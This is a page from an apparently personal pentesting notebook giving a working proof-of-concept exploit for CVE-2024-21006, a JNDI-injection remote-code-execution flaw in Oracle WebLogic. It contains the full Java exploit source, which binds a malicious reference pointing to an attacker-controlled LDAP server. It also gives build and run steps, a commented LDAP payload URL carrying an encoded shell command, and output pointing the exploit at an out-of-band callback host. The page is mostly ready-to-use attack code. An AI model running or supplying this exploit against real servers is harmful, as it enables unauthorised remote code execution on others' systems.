0xPThree.gitbook.io
  • Network Services
    • Ports
      • 21 - FTP
      • 22 - SSH
      • 23 - Telnet
      • 25, 465, 587 - SMTP(S)
      • 53 - DNS
      • 80, 443 - HTTP(S)
        • Frameworks
          • Drupal
          • Flask
          • Laravel
          • Tomcat
          • Werkzeug
        • Fuzzing
        • Grafana
        • Languages
          • PHP
        • WebDAV
        • Web Vulnerabilities
          • CloudFlare Bypass
          • Command Injection
          • CSTI
          • File Inclusion/Path Traversal
          • SQL Injection
          • SSI
          • SSTI
          • Upload bypass
          • XLST
          • XML Injection
      • 88 - Kerberos
      • 135, 593 - MSRPC
      • 139, 445 - SMB
      • 161, 162, 10161, 10162 - SNMP
      • 1433, 3306 - SQL
      • 2049 - NFS
      • 2375 - Docker
  • Active Directory
    • ADCS
    • DACL Abuse
      • AddMember
      • ForceChangePassword
      • Kerberoasting
      • ReadLAPSPassword
      • ReadGMSAPassword
      • Grant Ownership
      • Grant Rights
      • Logon Script
      • Rights on RODC object
    • Security groups
    • Misc
  • Coding Languages
    • Python
  • Exploits / PoC's
    • Ansible
      • Ansible AWX
    • Apache
      • HTTP Server - CVE-2021-41773
      • Struts - CVE-2024-53677 / S2-067
      • Tomcat - CVE-2020-1938 / CVE-2020-10487
      • Tomcat - CVE-2025-24813
    • Confluence - CVE-2023-22527
    • CUPS - CVE-2024-47***
    • D-Link
      • CVE-2020-29322
      • Decrypt firmware: DIR-X1560
    • Dmidecode - CVE-2023-30630
    • Erlang
      • OTP SSH - CVE-2025-32433
    • EternalBlue - MS17-010
    • Gitlab - CVE-2023-7028
    • Ivanti - CVE-2024-21893 / 21887
    • Jenkins - CVE-2024-23897
    • LXD group - N/A
    • nf_tables - CVE-2024-1086
    • NFS - N/A
    • Oracle
      • WebLogic - CVE-2018-2628
      • WebLogic - CVE-2019-2729
      • WebLogic - CVE-2023-21839
      • WebLogic - CVE-2024-20931
      • WebLogic - CVE-2024-21006
    • PHP
      • CVE-2024-4577
    • RunC
      • CVE-2022-0811
      • CVE-2024-21626
    • Snap - CVE-2019-7304
    • TP-Link - CVE-2024-5035
  • Hardware
    • Firmware
    • JTAG
    • SPI
    • UART
    • USB
  • Post Exploit
    • Compile payload
    • Obfuscation
    • Read VMDK files
    • Saved Credentials
      • Linux - Ansible AWX / Tower
      • Linux - Dell Networker
      • Windows - Mozilla Firefox
      • Windows - Notepad++
      • Windows - WinSCP
    • Session Hijack
    • Sniffing Passwords
    • Upgrade shell
    • VMware
      • Disk Encryption
      • LDAP Connection (SSO)
      • Restore VCSA Postgres Database
      • vCenter Forge SAML
      • Waiter Account Information
  • Development
    • Dnsmasq DHCP
    • Docker
      • Ansible AWX
      • Docker Compose
      • FirmAE - Emulate Firmware
      • Oracle WebLogic
      • Rocket.Chat
      • Tomcat
      • Vaultwarden
    • Harden Windows Host
    • HTTPS Proxy
    • Netplan + Networkd
    • SSL/TLS Certificates
  • TODO
Powered by GitBook
On this page
  • Proof-of-Concept
  • Oracle 14.1.1.0
  • Source code

Was this helpful?

  1. Exploits / PoC's
  2. Oracle

WebLogic - CVE-2024-21006

Last updated 7 months ago

Was this helpful?

CVE-2024-21006 reveals a new WebLogic attack method: secondary JNDI injection, that is, triggering JNDI injection during the JNDI injection process, thereby completing RCE.

Project is based on the findings of and code from .

Proof-of-Concept

Oracle 14.1.1.0

apt :: ~ » docker container ls
CONTAINER ID   IMAGE                                                        COMMAND                  CREATED        STATUS       PORTS                                                                                  NAMES
fa9822b7dfd5   container-registry.oracle.com/middleware/weblogic:14.1.1.0   "/u01/oracle/createA…"   23 hours ago   Up 2 hours   0.0.0.0:7001->7001/tcp, :::7001->7001/tcp, 0.0.0.0:9002->9002/tcp, :::9002->9002/tcp   14110-weblogic

Prepare the environment by uploading MainClass.java and META-INF/MANIFEST.MF to the WebLogic container.

[oracle@14110-weblogic lib]$ curl -OL 172.17.0.1/MainClass.java
[oracle@14110-weblogic lib]$ curl -OL 172.17.0.1/MANIFEST.MF
[oracle@14110-weblogic lib]$ mkdir META-INF
[oracle@14110-weblogic lib]$ mv MANIFEST.MF META-INF/

Compile the code.

[oracle@14110-weblogic lib]$ javac -cp /u01/oracle/wlserver/server/lib/weblogic.jar MainClass.java
[oracle@14110-weblogic lib]$ ls -al | grep MainClass
-rw-rw-r-- 1 oracle oracle    2033 Oct 10 08:03 MainClass$1.class
-rw-rw-r-- 1 oracle oracle    1386 Oct 10 08:03 MainClass.class
-rw-rw-r-- 1 oracle oracle    3717 Oct 10 08:01 MainClass.java

[oracle@14110-weblogic lib]$ jar cvfm cve-2024-21006.jar META-INF/MANIFEST.MF *.class
added manifest
adding: MainClass$1.class(in = 2033) (out= 671)(deflated 66%)
adding: MainClass.class(in = 2161) (out= 1100)(deflated 49%)
[oracle@14110-weblogic lib]$ java -jar cve-2024-21006.jar
Target IP: 127.0.0.1
Target Port: 7001
RMI Address (ip:port/exp): wssm1qvzn5i56ehqjskcwdmtckib639ry.oastify.com

Source code

// MainClass.java
import weblogic.j2ee.descriptor.InjectionTargetBean;
import weblogic.j2ee.descriptor.MessageDestinationRefBean;
import javax.naming.*;
import java.util.Scanner;
import java.util.Hashtable;
import java.util.Random;

public class MainClass {

    public static void main(String[] args) throws Exception {
	Scanner scanner = new Scanner(System.in);
	System.out.print("Target IP: ");
	String ip = scanner.nextLine();
	System.out.print("Target Port: ");
	String port = scanner.nextLine();
	System.out.print("RMI Address (ip:port/exp): ");
	String rmiexp = scanner.nextLine();
	Random bindname = new Random();
	int bindint = bindname.nextInt(10000);
//        String ip = "127.0.0.1";
//        String port = "7001";
//        String rmiurl = "ldap://192.168.0.103/cVLtcNoHML/Plain/Exec/eyJjbWQiOiJ0b3VjaCAvdG1wL3N1Y2Nlc3MxMjMifQ==";
        String rhost = String.format("iiop://%s:%s", ip, port);
        Hashtable<String, String> env = new Hashtable<String, String>();
        // add wlsserver/server/lib/weblogic.jar to classpath,else will error.
        env.put("java.naming.factory.initial", "weblogic.jndi.WLInitialContextFactory");
        env.put(Context.PROVIDER_URL, rhost);
        Context context = new InitialContext(env);
//        Reference reference = new Reference("weblogic.application.naming.MessageDestinationObjectFactory","weblogic.application.naming.MessageDestinationObjectFactory","");
        weblogic.application.naming.MessageDestinationReference messageDestinationReference=new weblogic.application.naming.MessageDestinationReference(null, new MessageDestinationRefBean() {
            @Override
            public String[] getDescriptions() {
                return new String[0];
            }

            @Override
            public void addDescription(String s) {

            }

            @Override
            public void removeDescription(String s) {

            }

            @Override
            public void setDescriptions(String[] strings) {

            }

            @Override
            public String getMessageDestinationRefName() {
                return null;
            }

            @Override
            public void setMessageDestinationRefName(String s) {

            }

            @Override
            public String getMessageDestinationType() {
                return "weblogic.application.naming.MessageDestinationReference";
            }

            @Override
            public void setMessageDestinationType(String s) {

            }

            @Override
            public String getMessageDestinationUsage() {
                return null;
            }

            @Override
            public void setMessageDestinationUsage(String s) {

            }

            @Override
            public String getMessageDestinationLink() {
                return null;
            }

            @Override
            public void setMessageDestinationLink(String s) {

            }

            @Override
            public String getMappedName() {
                return null;
            }

            @Override
            public void setMappedName(String s) {

            }

            @Override
            public InjectionTargetBean[] getInjectionTargets() {
                return new InjectionTargetBean[0];
            }

            @Override
            public InjectionTargetBean createInjectionTarget() {
                return null;
            }

            @Override
            public void destroyInjectionTarget(InjectionTargetBean injectionTargetBean) {

            }

            @Override
            public String getLookupName() {
                return null;
            }

            @Override
            public void setLookupName(String s) {

            }

            @Override
            public String getId() {
                return null;
            }

            @Override
            public void setId(String s) {

            }
        }, "ldap://" + rmiexp, null, null);

        context.bind("pthree"+bindint,messageDestinationReference);
        context.lookup("pthree"+bindint);
    }
}
// META-INF/MANIFEST.MF
Manifest-Version: 1.0
Main-Class: MainClass
Class-Path: /u01/oracle/wlserver/server/lib/weblogic.jar

pwnull
momika223
Burp Collaborator callback indicating a successful exploit attempt